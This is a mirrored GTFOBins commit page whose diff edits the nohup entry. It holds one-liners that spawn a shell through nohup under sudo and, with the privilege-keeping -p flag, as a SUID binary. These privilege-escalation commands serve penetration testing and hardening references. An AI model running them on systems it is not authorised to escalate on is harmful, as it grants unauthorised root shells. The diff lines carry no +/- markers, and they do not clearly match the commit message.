mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-26 06:49:44 +01:00
Remove redundant sudo from SUID category
This commit is contained in:
parent
bb4050810e
commit
db40142ea7
@ -8,7 +8,7 @@ functions:
|
|||||||
nohup "$COMMAND"
|
nohup "$COMMAND"
|
||||||
cat nohup.out
|
cat nohup.out
|
||||||
sudo:
|
sudo:
|
||||||
- code: sudo nohup /bin/sh -c "sh <$(tty) >$(tty) 2>$(tty)"
|
- code: nohup /bin/sh -c "sh <$(tty) >$(tty) 2>$(tty)"
|
||||||
suid:
|
suid:
|
||||||
- code: sudo nohup /bin/sh -p -c "sh -p <$(tty) >$(tty) 2>$(tty)"
|
- code: sudo nohup /bin/sh -p -c "sh -p <$(tty) >$(tty) 2>$(tty)"
|
||||||
---
|
---
|
||||||
|
Loading…
Reference in New Issue
Block a user